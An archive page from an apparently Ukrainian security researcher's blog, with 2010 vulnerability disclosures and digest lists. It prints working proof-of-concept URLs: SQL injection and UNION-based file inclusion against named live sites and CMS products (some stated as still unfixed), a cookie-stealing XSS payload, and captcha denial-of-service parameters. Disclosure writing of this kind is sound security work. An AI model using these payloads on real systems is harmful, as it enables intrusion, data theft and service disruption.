Архів для категорії 'Уразливості'

Уразливості на chip.ua

19:20 14.04.2010

15.01.2008

У червні, 16.06.2007, я знайшов Full path disclosure і SQL Injection уразливості на http://chip.ua - сайті журнала Chip. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

14.04.2010

Full path disclosure:

http://chip.ua/?page=ce_ar&p=-1

http://chip.ua/?page=poll&id=’

SQL Injection:

http://chip.ua/?page=poll&id=39%20and%20version()%3E=5

Дані уразливості досі не виправлені. Причому, якщо шляхи на сервері та версію MySQL вони змінили за цей час, то дірки вони так і не виправили.

Добірка уразливостей

17:27 13.04.2010

В даній добірці уразливості в веб додатках:

  • OpenSSH vulnerabilities (деталі)
  • New openssh packages fix denial of service (деталі)
  • phpCollegeExchange 0.1.5c Multiple SQL Injection Vulnerabilities (деталі)
  • E-Store SQL Injection Vulnerability (деталі)
  • Digital Scribe 1.4.1 Multiple SQL Injection Vulnerabilities (деталі)
  • Multiple XSS and Injection Vulnerabilities in TestLink Test Management and Execution System (деталі)
  • Miniweb 2.0 Full Path Disclosure (деталі)
  • SQL Injection vulnerability in EEGshop v1.2 (деталі)
  • B2C Booking Centre Systems - SQL Injection Vulnerability (деталі)
  • DoS Vulnerability in Aruba Mobility Controller Caused by Malformed EAP Frame (деталі)

Уразливості в com_bookman для Joomla

23:59 10.04.2010

У березні, 17.03.2010, я знайшов Insufficient Anti-automation та Denial of Service уразливості в компоненті com_bookman для Joomla. Також даний компонент входить до складу Reservation Manager for Joomla. Про що найближчим часом сповіщу розробників.

Уразливості наявні в скрипті капчі CaptchaSecurityImages.php, що використовується в даній системі. Про уразливості в CaptchaSecurityImages я вже розповідав.

Раніше я вже згадував про CB Captcha для Joomla і Mambo, що також використовує даний скрипт капчі.

Insufficient Anti-automation:

http://site/components/com_bookman/functions/CaptchaSecurityImages.php?width=150&height=100&characters=2

Можливий обхід капчі через напівавтоматизований або автоматизований (з використанням OCR) методи, що були згадані раніше.

DoS:

http://site/components/com_bookman/functions/CaptchaSecurityImages.php?width=1000&height=9000

Вказавши великі значення width і height можна створити велике навантаження на сервер.

Уразливі всі версії com_bookman та всі версії Reservation Manager for Joomla.

Добірка уразливостей

15:29 10.04.2010

В даній добірці уразливості в веб додатках:

Уразливості в ClickCMS

23:55 09.04.2010

У березні, 17.03.2010, я знайшов Insufficient Anti-automation та Denial of Service уразливості в системі ClickCMS (Click Content Management System) що входить до ClickEMU. Про що найближчим часом сповіщу розробників.

Уразливості наявні в скрипті капчі CaptchaSecurityImages.php, що використовується в даній системі. Про уразливості в CaptchaSecurityImages я вже розповідав.

Insufficient Anti-automation:

http://site/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2

Можливий обхід капчі як через напівавтоматизований або автоматизований (з використанням OCR) методи, що були згадані раніше, так і з використанням метода session reusing with constant captcha bypass method, описаного в проекті MoBiC. Останній варіант атаки можливий через некоректну реалізацію захисту в системі від даного методу обходу.

DoS:

http://site/captcha/CaptchaSecurityImages.php?width=1000&height=9000

Вказавши великі значення width і height можна створити велике навантаження на сервер.

Уразливі всі версії ClickCMS.

Уразливості на www.paritet.ua

19:04 09.04.2010

07.10.2009

У лютому, 08.02.2009, я знайшов SQL Injection, Full path disclosure, SQL DB Structure Extraction та Cross-Site Scripting уразливості на сайті http://www.paritet.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

09.04.2010

SQL Injection:

http://www.paritet.ua/?mid=9%20and%20version()=5

Full path disclosure:

http://www.paritet.ua/?mid=-1

SQL DB Structure Extraction:

http://www.paritet.ua/?mid=-1′

XSS:

http://www.paritet.ua/?mid=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Дані уразливості вже виправлені. Окрім SQL Injection уразливості, що дуже несерйозно.

Уразливості в Sebo - webstore

23:56 08.04.2010

У березні, 17.03.2010, я знайшов Insufficient Anti-automation та Denial of Service уразливості в Sebo - webstore (e-commerce система). Про що найближчим часом сповіщу розробників.

Уразливості наявні в скрипті капчі CaptchaSecurityImages.php, що використовується в даній системі. Про уразливості в CaptchaSecurityImages я вже розповідав.

Insufficient Anti-automation:

http://site/libs/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2

Можливий обхід капчі як через напівавтоматизований або автоматизований (з використанням OCR) методи, що були згадані раніше, так і з використанням метода session reusing with constant captcha bypass method, описаного в проекті MoBiC.

DoS:

http://site/libs/captcha/CaptchaSecurityImages.php?width=1000&height=9000

Вказавши великі значення width і height можна створити велике навантаження на сервер.

Уразливі Sebo - webstore 0.14 та попередні версії.

Нові уразливості в CMS SiteLogic

19:01 07.04.2010

09.02.2010

У червні, 28.06.2009, я знайшов SQL Injection, Local File Inclusion, Directory Traversal та Full path disclosure уразливості в CMS SiteLogic. Це українська комерційна CMS. Уразливості виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в CMS SiteLogic.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

07.04.2010

SQL Injection:

http://site/?fun=-1%20or%20version()%3E4

Local File Inclusion (через SQL Injection):

http://site/?fun=-1%20union%20select%201,0,char(46,46,47,105,110,100,101,120,46,112,104,112),1

Включення index.php.

Directory Traversal (через SQL Injection):

http://site/?fun=-1%20union%20select%201,0,char(46,46,47,46,104,116,97,99,99,101,115,115),1

Включення .htaccess.

Full path disclosure:

http://site/?fun=-1

Добірка уразливостей

16:29 06.04.2010

В даній добірці уразливості в веб додатках:

  • Netgear SSL312 Router - remote DoS (деталі)
  • Netgear SSL312 Router - remote DoS (деталі)
  • Theeta CMS (Cross Site Scripting, SQL Injection) Multiple Vulnerabilities (деталі)
  • Eshopbuilde CMS SQL Injection Vulnerability (деталі)
  • Xxasp v3.3.2 Sql injection (деталі)
  • Cacti 0.8.7e: Multiple security issues (деталі)
  • 40 vulnerabilities in SMF 1.1.10/SMF 2.0RC2 by elhacker.net (деталі)
  • TFTPUtil GUI TFTP Server Denial of Service Vulnerability (деталі)
  • TFTPUtil GUI TFTP Server Denial of Service Vulnerability (деталі)
  • PHPIDS Unserialize() Vulnerability (деталі)

Уразливості в CCMS

23:52 03.04.2010

У березні, 17.03.2010, я знайшов Insufficient Anti-automation та Denial of Service уразливості в системі CCMS - Clan Content Management System. Про що найближчим часом сповіщу розробників.

Уразливості наявні в скрипті капчі CaptchaSecurityImages.php, що використовується в даній системі. Про уразливості в CaptchaSecurityImages я вже розповідав.

Insufficient Anti-automation:

http://site/CaptchaSecurityImages.php?width=150&height=100&characters=2

Можливий обхід капчі через напівавтоматизований або автоматизований (з використанням OCR) методи, що були згадані раніше.

DoS:

http://site/CaptchaSecurityImages.php?width=1000&height=9000

Вказавши великі значення width і height можна створити велике навантаження на сервер.

Уразлива версія CCMS 1.0.